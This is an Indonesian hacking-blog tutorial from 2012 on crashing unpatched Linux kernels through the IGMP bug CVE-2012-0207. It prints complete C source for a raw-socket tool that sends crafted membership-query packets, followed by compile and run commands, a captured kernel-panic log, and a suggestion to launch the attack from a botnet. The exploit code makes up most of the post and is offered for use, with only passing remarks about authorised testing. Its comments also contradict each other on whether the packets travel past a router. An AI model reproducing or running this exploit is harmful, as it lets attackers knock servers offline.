Denial Of Service [DoS] Linux Kernel 2.6.36+ (CVE-2012-0207, IGMP)

Sabtu, 31 Maret 2012

Kali ini kami akan berbagi cara melakukan DoS terhadap server Linux menggunakan tool berikut. DoS ini memanfaatkan bug pada penanganan paket IGMP di kernel Linux (CVE-2012-0207): paket IGMP membership query yang dibentuk khusus memicu divide error di igmp_start_timer sehingga kernel panic.

Oke yang perlu dipersiapkan adalah:
  1. Siapkan server / pc untuk mengcompile source ddos.
  2. Siapkan pc target Linux yang kernelnya rentan: kernel 2.6.36 atau yang lebih baru dan belum dipatch untuk CVE-2012-0207 (log di bawah berasal dari kernel 3.1.0, jadi bukan hanya 2.6.36). Gunakan hanya mesin yang memang boleh kalian uji.
  3. Memulai attack :)
Berikut adalah code DoS tools:
/*
** attacklinux.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** Credits to Ben Hutchings:
** This code can attack targets beyond the LAN (NOTE: the header built below sets ttl = 1, so as written the packet is dropped at the first router and only reaches hosts on the same link) and is NOT kcope's code. It is based on the IGMPv3 membership-query bug, which was reported for Windows but also affects Linux, in IGMPv3 as it happens. It can easily be turned into a very fast packet generator, and since it does not care what the IPs are, results might be seen remotely. Feel free to update or send a comment; all comments go through me before anything is published, so be sure the code is safe — I only post corrected code. Please do not add it to your DoS collection; the packet is easy to block now that it is released.
XD loves u all
** Example:
** ./attacklinux SRC_IP DST_IP        (needs a raw socket, i.e. root / CAP_NET_RAW)
** The Linux kernel on the remote side panics (divide error in igmp_start_timer,
** see the log below) when the packets are received — still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
/*
 * Hand-rolled IPv4 header (RFC 791 layout) used instead of <netinet/ip.h>
 * so the file controls the exact on-wire bytes.  Multi-byte fields are
 * filled in network byte order by the caller (htons / inet_addr).  Two
 * trailing option words are declared so that ihl = 7 (7 * 4 = 28 bytes)
 * equals sizeof(struct iphdr); they are transmitted as zeros.
 * NOTE(review): the tag presumably clashes with the struct iphdr in glibc's
 * <netinet/ip.h> — do not include that header while this definition exists.
 */
struct iphdr {
	unsigned char ihl:4;      /* header length in 32-bit words (GCC/LE: low nibble of byte 0) */
	unsigned char version:4;  /* 4 */
	unsigned char tos;
	unsigned short tot_len;   /* header + payload length, network order */
	unsigned short id;
	unsigned short frag_off;
	unsigned char ttl;
	unsigned char protocol;   /* IPPROTO_IGMP for this tool */
	unsigned short check;     /* header checksum; zero while it is being computed */
	unsigned int saddr;
	unsigned int daddr;
	unsigned int options1;    /* zero option words padding the header to ihl = 7 */
	unsigned int options2;
};
/*
 * IGMP message as laid out on the wire: type, max-response code, checksum
 * and group address (the prefix shared by the IGMPv2 and IGMPv3 query
 * formats).  The padding stays zero; main() sends either the first 8 bytes
 * or the first 12 bytes of this structure.
 */
struct igmp_query {
	unsigned char type;        /* 0x11 = membership query */
	unsigned char maxresponse; /* max response code; 0xff in the first packet, 0 in the second */
	unsigned short csum;       /* checksum over the bytes actually sent, zero while computing */
	unsigned int mcast;        /* group address, 0.0.0.0 in both packets */
	char padding[40];          /* zero fill; bytes 8..11 go out with the 12-byte packet */
};
unsigned short in_chksum(unsigned short *addr, int len);

/*
 * RFC 1071 Internet checksum over the len bytes starting at addr.
 *
 * 16-bit words are summed exactly as they sit in memory (no byte swapping);
 * a trailing odd byte is taken as the low-address half of one more word;
 * the carries are folded back twice and the one's complement is returned.
 * Because the words are consumed in memory order, the result written back
 * into a header field is already in network order.  Callers zero the
 * checksum field before calling (see main()).
 *
 * addr: start of the region (IP header or IGMP payload here).
 * len:  number of bytes to cover; may be odd.
 */
unsigned short in_chksum(unsigned short *addr, int len) {
	unsigned int acc = 0;
	const unsigned short *word = addr;
	int remaining = len;

	for (; remaining > 1; remaining -= 2)
		acc += *word++;

	if (remaining == 1) {
		unsigned short last = 0;
		memcpy(&last, word, 1); /* odd byte lands in the low-address half */
		acc += last;
	}

	/* fold the 32-bit accumulator back into 16 bits */
	acc = (acc >> 16) + (acc & 0xffff);
	acc += acc >> 16;
	return (unsigned short)~acc;
}
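long resolve(char *);

/*
 * Resolve a host name or dotted-quad string to an IPv4 address.
 *
 * host: name or numeric address; NULL is rejected.
 * Returns the address in network byte order, zero-extended into a long,
 * or -1 when gethostbyname() fails, returns a non-AF_INET family, has no
 * address, or reports an address length other than 4 bytes.  Callers
 * compare against -1 before using the value.
 *
 * Fixes over the original: the result is fully initialised (the original
 * memcpy'd h_length bytes into an uninitialised long, leaving the upper
 * bytes indeterminate on 64-bit hosts), and h_length is checked instead of
 * trusted as a copy length.  On hosts where long is 32 bits the address
 * 255.255.255.255 is still indistinguishable from the -1 error value.
 */
long resolve(char *host) {
	struct hostent *hst;
	unsigned int addr4 = 0;

	if (host == NULL)
		return -1;
	hst = gethostbyname(host);
	if (hst == NULL || hst->h_addrtype != AF_INET || hst->h_addr_list == NULL
	    || hst->h_addr_list[0] == NULL || hst->h_length != (int)sizeof addr4)
		return -1;
	memcpy(&addr4, hst->h_addr_list[0], sizeof addr4);
	return (long)addr4;
}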
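/*
 * Open a raw IPv4 socket, send one complete datagram (IP header included —
 * on Linux an IPPROTO_RAW socket behaves as if IP_HDRINCL were set) to dst
 * and close the socket again.
 *
 * Returns 0 on success, 1 if socket() fails, -1 if sendto() fails (the
 * errno message has already been printed).  These mirror the original's
 * two failure paths so main() can keep its exit codes.
 */
static int send_raw(const char *pkt, size_t len, const struct sockaddr_in *dst) {
	int rc = 0;
	int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

	if (s == -1)
		return 1;
	if (sendto(s, pkt, len, 0, (const struct sockaddr *)dst, sizeof *dst) == -1) {
		perror("Error sending packet");
		rc = -1;
	}
	close(s);
	return rc;
}

/*
 * Entry point: ./attacklinux SRC_IP DST_IP
 *
 * Builds and sends the two IGMP membership-query packets that crash an
 * unpatched kernel (CVE-2012-0207; the panic log below shows a divide error
 * in igmp_start_timer reached from igmp_rcv).  Which of the two packets
 * trips the zero divisor is not established by this file — confirm against
 * igmp_heard_query in the target kernel.
 *
 * argv[1] is written verbatim into the IP source field (it is not checked
 * against any local interface, so it is effectively spoofed); argv[2] is
 * the target.  A raw socket is required, so this normally runs as root /
 * with CAP_NET_RAW.  ttl is 1, so only a target on the same link is reached.
 *
 * Exit status, as in the original: 0 on success, 1 on usage error, failed
 * resolution or socket() failure, 255 (exit(-1)) on a sendto() error.
 *
 * Fixes over the original: resolve() failures are detected instead of
 * becoming 255.255.255.255 (-1 truncated to 32 bits); dst is zeroed; the
 * IP checksum is computed after saddr/daddr are filled in (the original
 * summed the header before setting them) and recomputed for the second
 * packet; the second packet's tot_len is byte-swapped like the first; both
 * sockets are closed; unused locals are gone.  Linux is documented to
 * rewrite the IP checksum and total length on raw sockets, which is
 * presumably why the original worked despite those two bugs.
 */
int main(int argc, char *argv[]) {
	struct sockaddr_in dst;
	struct iphdr *ip;
	struct igmp_query *igmp;
	long daddr, saddr;
	char buf[1500];
	int rc;

	if (argc < 3) {
		printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
		       "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
		printf("Usage: %s <src ip> <dst ip>\n", argv[0]);
		return 1;
	}

	daddr = resolve(argv[2]);
	saddr = resolve(argv[1]);
	if (daddr == -1 || saddr == -1) {
		fprintf(stderr, "Cannot resolve %s\n", daddr == -1 ? argv[2] : argv[1]);
		return 1;
	}

	memset(buf, 0, sizeof buf);
	memset(&dst, 0, sizeof dst); /* sin_port / sin_zero were left uninitialised before */
	ip = (struct iphdr *)buf;
	igmp = (struct igmp_query *)(buf + sizeof *ip);

	dst.sin_family = AF_INET;
	dst.sin_addr.s_addr = (unsigned int)daddr;

	/* IPv4 header: ihl 7 = 28 bytes, the 20-byte header plus the two
	 * zeroed option words declared in struct iphdr. */
	ip->ihl = 7;
	ip->version = 4;
	ip->tos = 0;
	ip->id = htons(18277);
	ip->frag_off = 0;
	ip->ttl = 1; /* dies at the first router */
	ip->protocol = IPPROTO_IGMP;
	ip->saddr = (unsigned int)saddr;
	ip->daddr = (unsigned int)daddr;
	ip->options1 = 0;
	ip->options2 = 0;

	/* Packet 1: membership query (0x11), max response 0xff, group
	 * 0.0.0.0, 8-byte IGMP payload. */
	igmp->type = 0x11;
	igmp->maxresponse = 0xff;
	igmp->mcast = inet_addr("0.0.0.0");
	igmp->csum = 0; /* checksum field must be zero while it is computed */
	igmp->csum = in_chksum((unsigned short *)igmp, 8);
	ip->tot_len = htons((unsigned short)(sizeof *ip + 8));
	ip->check = 0;
	ip->check = in_chksum((unsigned short *)ip, (int)sizeof *ip);

	printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
	rc = send_raw(buf, sizeof *ip + 8, &dst);
	if (rc == 1)
		return 1;
	if (rc == -1)
		exit(-1);

	/* Packet 2: same query with max response 0 and a 12-byte payload
	 * (bytes 8..11 are the zero padding of struct igmp_query). */
	ip->id = htons(18278);
	igmp->type = 0x11;
	igmp->maxresponse = 0;
	igmp->mcast = inet_addr("0.0.0.0");
	igmp->csum = 0;
	igmp->csum = in_chksum((unsigned short *)igmp, 12);
	ip->tot_len = htons((unsigned short)(sizeof *ip + 12));
	ip->check = 0; /* id and tot_len changed, so the header checksum must be redone */
	ip->check = in_chksum((unsigned short *)ip, (int)sizeof *ip);

	printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
	rc = send_raw(buf, sizeof *ip + 12, &dst);
	if (rc == 1)
		return 1;
	if (rc == -1)
		exit(-1);
	return 0;
}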
Cara menjalankannya adalah
  1. Simpan code di atas dengan nama file: dos-linux.c
  2. Compile source diatas menggunakan gcc: gcc dos-linux.c -o attacklinux
  3. Setelah selesai, jalankan sebagai root (program membuka raw socket) dengan perintah: ./attacklinux source_ip destination_ip , misal: ./attacklinux 127.0.0.1 10.10.10.10. Nilai source_ip ditulis apa adanya ke field source address header IP (tidak dicek terhadap interface lokal), sedangkan destination_ip adalah target.
Download Source Code Toolsnya Disini:
Apabila berhasil, pada server target akan terjadi kernel panic dengan log seperti berikut (di sini ditangkap lewat netconsole; perhatikan baris "divide error" dan RIP di igmp_start_timer):
binushacker $ gcc dos-linux.c -o attacklinux
binushacker $ ./attacklinux 127.0.0.1 10.10.10.10
[ 274.903179] netconsole: local IP 0.0.0.0
[ 274.903181] netconsole: interface 'eth0'
[ 274.903185] netconsole: remote IP 10.10.10.10
[ 274.903191] netconsole: local IP 127.0.0.1
[ 274.903244] console [netcon0] enabled
[ 274.903247] netconsole: network logging started
[ 283.360160] usb 4-2: new full speed USB device number 4 using uhci_hcd
[ 283.526265] usb 4-2: New USB device found, idVendor=0a5c, idProduct=2145
[ 283.526280] usb 4-2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 283.526289] usb 4-2: Product: ThinkPad Bluetooth with Enhanced Data Rate II
[ 283.526297] usb 4-2: Manufacturer: Lenovo Computer Corp
[ 2171.144135] usb 4-2: USB disconnect, device number 4
[ 2178.490539] wlan0: deauthenticating from 10.10.10.10 by local choice (reason=3)
[ 2178.506572] cfg80211: Calling CRDA to update world regulatory domain
[ 2178.523720] cfg80211: World regulatory domain updated:
[ 2178.523741] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[ 2178.523752] cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523762] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523772] cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523781] cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523791] cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 4622.662356] iwlagn 0000:03:00.0: L1 Disabled; Enabling L0S
[ 4622.662756] iwlagn 0000:03:00.0: Radio type=0x0-0x2-0x0
[ 4622.717229] ADDRCONF(NETDEV_UP): wlan0: link is not ready
[ 4630.334443] wlan0: authenticate with 10.10.10.10 (try 1)
[ 4630.336213] wlan0: authenticated
[ 4630.340174] wlan0: associate with 10.10.10.10 (try 1)
[ 4630.356310] wlan0: RX AssocResp from 10.10.10.10 (capab=0x431 status=0 aid=2)
[ 4630.356318] wlan0: associated
[ 4630.362820] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[ 4640.576058] wlan0: no IPv6 routers present
[ 7853.283020] Monitor-Mwait will be used to enter C-3 state
[ 7853.285825] thinkpad_acpi: EC reports that Thermal Table has changed
[16107.346657] thinkpad_acpi: EC reports that Thermal Table has changed
[16111.048524] divide error: 0000 [#1] SMP
[16111.048627] CPU 1
[16111.048664] Modules linked in: netconsole configfs ip6table_filter ip6_tables ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM acpi_cpufreq mperf iptable_mangle cpufreq_powersave cpufreq_conservative xt_tcpudp iptable_filter cpufreq_stats ip_tables x_tables cpufreq_userspace bridge stp parport_pc ppdev lp parport bnep rfcomm binfmt_misc deflate ctr twofish_generic twofish_x86_64 twofish_common camellia serpent blowfish cast5 des_generic xcbc rmd160 sha512_generic sha1_generic hmac crypto_null af_key ext2 fuse loop kvm_intel kvm ecb btusb bluetooth snd_hda_codec_conexant crc16 uvcvideo videodev snd_hda_intel media cdc_ether snd_hda_codec v4l2_compat_ioctl32 usbnet cdc_acm mii snd_hwdep cdc_wdm arc4 snd_pcm_oss snd_mixer_oss snd_pcm thinkpad_acpi snd_seq_midi snd_rawmidi iwlagn snd_seq_midi_event mac80211 cfg80211 snd_seq snd_timer snd_seq_device iTCO_wdt i2c_i801 snd snd_page_alloc iTCO_vendor_support rfkill i915 drm_kms_helper drm soundcore i2c_algo_bit tpm_tis psmouse tpm i2c_core wmi battery pcspkr tpm_bios ac nvram power_supply evdev serio_raw video processor button ext3 jbd mbcache btrfs zlib_deflate crc32c libcrc32c cbc dm_snapshot dm_mirror dm_region_hash dm_log dm_crypt dm_mod cryptd aes_x86_64 aes_generic sha256_generic sd_mod crc_t10dif uhci_hcd ata_generic thermal thermal_sys ahci libahci ehci_hcd libata e1000e scsi_mod usbcore [last unloaded: scsi_wait_scan]
[16111.051698]
[16111.051732] Pid: 5416, comm: NetworkManager Not tainted 3.1.0-1-amd64 #1 LENOVO 74663RG/74663RG
[16111.051888] RIP: 0010:[<ffffffff812bf78c>] [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP: 0018:ffff88013bc83ab0 EFLAGS: 00010246
[16111.052013] RAX: 000000000efb921d RBX: ffff8801347932c0 RCX: 00000001003c507a
[16111.052013] RDX: 0000000000000000 RSI: 0000000056000000 RDI: ffff8801347932f8
[16111.052013] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[16111.052013] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801363ca480
[16111.052013] R13: 00000000fb0000e0 R14: 0000000000000000 R15: 0000000000000000
[16111.052013] FS: 00007f3909c057e0(0000) GS:ffff88013bc80000(0000) knlGS:0000000000000000
[16111.052013] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[16111.052013] CR2: 00007f3906e2449b CR3: 00000001097a2000 CR4: 00000000000006e0
[16111.052013] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[16111.052013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[16111.052013] Process NetworkManager (pid: 5416, threadinfo ffff880116fe0000, task ffff8800af283510)
[16111.052013] Stack:
[16111.052013] ffff8801347932f8 ffff8801347932c0 ffff8800373cc3c0 ffffffff812c166e
[16111.052013] 0000000000000000 ffff8801347932f8 ffff880134793350 0000000000000000
[16111.052013] 0002000000000000 ffff8800373cc3c0 ffffffff817f8280 0000000000000002
[16111.052013] Call Trace:
[16111.052013] <IRQ>
[16111.052013] [<ffffffff812c166e>] ? igmp_rcv+0x480/0x515
[16111.052013] [<ffffffff81297cdf>] ? ip_local_deliver_finish+0x137/0x1a4
[16111.052013] [<ffffffff8126f54f>] ? __netif_receive_skb+0x3e3/0x415
[16111.052013] [<ffffffff81270dc0>] ? netif_receive_skb+0x63/0x69
[16111.052013] [<ffffffffa03c4775>] ? ieee80211_frame_allowed+0x68/0xc3 [mac80211]
[16111.052013] [<ffffffffa03c4b33>] ? ieee80211_deliver_skb+0xbb/0xf1 [mac80211]
[16111.052013] [<ffffffffa03c5d67>] ? ieee80211_rx_handlers+0xf19/0x1755 [mac80211]
[16111.052013] [<ffffffff81291f5d>] ? nf_iterate+0x41/0x77
[16111.052013] [<ffffffff81297804>] ? inet_del_protocol+0x27/0x27
[16111.052013] [<ffffffffa03c6d15>] ? ieee80211_prepare_and_rx_handle+0x772/0x7ca [mac80211]
[16111.052013] [<ffffffffa03c7440>] ? ieee80211_rx+0x6d3/0x6f8 [mac80211]
[16111.052013] [<ffffffffa03f04b6>] ? iwl_rx_reply_rx+0x429/0x441 [iwlagn]
[16111.052013] [<ffffffff811acff2>] ? is_swiotlb_buffer+0x23/0x2f
[16111.052013] [<ffffffffa03f61b4>] ? iwl_irq_tasklet+0x3cb/0x645 [iwlagn]
[16111.052013] [<ffffffff8104afe0>] ? raise_softirq_irqoff+0x6/0x25
[16111.052013] [<ffffffff8104a52a>] ? tasklet_action+0x73/0xc2
[16111.052013] [<ffffffff8104ad14>] ? __do_softirq+0xb9/0x177
[16111.052013] [<ffffffff81334a2c>] ? call_softirq+0x1c/0x30
[16111.052013] [<ffffffff8100f845>] ? do_softirq+0x3c/0x7b
[16111.052013] [<ffffffff8104af7c>] ? irq_exit+0x3c/0x9a
[16111.052013] [<ffffffff8100f575>] ? do_IRQ+0x82/0x98
[16111.052013] [<ffffffff8132db2e>] ? common_interrupt+0x6e/0x6e
[16111.052013] <EOI>
[16111.052013] [<ffffffff810b6195>] ? get_page_from_freelist+0x2b2/0x665
[16111.052013] [<ffffffff810b6043>] ? get_page_from_freelist+0x160/0x665
[16111.052013] [<ffffffff810b67d4>] ? __alloc_pages_nodemask+0x12b/0x748
[16111.052013] [<ffffffff810b6d89>] ? __alloc_pages_nodemask+0x6e0/0x748
[16111.052013] [<ffffffff810df014>] ? alloc_pages_current+0xb2/0xcc
[16111.052013] [<ffffffff8102f6fd>] ? pte_alloc_one+0x11/0x39
[16111.052013] [<ffffffff810ca1c6>] ? __pte_alloc+0x19/0x11e
[16111.052013] [<ffffffff810cc42e>] ? handle_mm_fault+0x18d/0x1ea
[16111.052013] [<ffffffff813307c0>] ? do_page_fault+0x312/0x337
[16111.052013] [<ffffffff810b9389>] ? put_page+0x18/0x27
[16111.052013] [<ffffffff810ca93b>] ? do_wp_page+0x551/0x563
[16111.052013] [<ffffffff810cc0b7>] ? handle_pte_fault+0x739/0x79f
[16111.052013] [<ffffffff8132ddf5>] ? page_fault+0x25/0x30
[16111.052013] [<ffffffff811a2ca3>] ? __strncpy_from_user+0x32/0x48
[16111.052013] [<ffffffff811a2c89>] ? __strncpy_from_user+0x18/0x48
[16111.052013] [<ffffffff810fc331>] ? getname_flags+0x152/0x1d7
[16111.052013] [<ffffffff810148a5>] ? sys_execve+0x1a/0x54
[16111.052013] [<ffffffff81332c2c>] ? stub_execve+0x6c/0xc0
[16111.052013] Code: 0c 58 48 8d 7b 08 5b 5d e9 5a f8 ff ff 58 5b 5d c3 55 89 f5 53 48 89 fb 52 e8 b4 3d ee ff 31 d2 48 8b 0d 78 08 3d 00 48 8d 7b 38 <f7> f5 c6 83 94 00 00 00 01 48 63 d2 48 8d 74 11 02 e8 bb 24 d9
[16111.052013] RIP [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP <ffff88013bc83ab0>
[16111.168911] ---[ end trace 3945f5f1af3c1493 ]---
[16111.168922] Kernel panic - not syncing: Fatal exception in interrupt
[16111.171624] Pid: 5416, comm: NetworkManager Tainted: G D 3.1.0-1-amd64 #1
[16111.174416] Call Trace:
binushacker $
DoS dengan IGMP ini juga bisa dijalankan dari banyak host sekaligus (DDoS) apabila kalian memiliki BOTNET :) Perhatikan bahwa ttl pada header IP di-set 1, sehingga paket hanya sampai ke target yang berada pada segmen jaringan yang sama (tidak melewati router); dan uji coba hanya pada sistem yang kalian punya izin untuk mengujinya.
Selamat mencoba semoga berhasil..
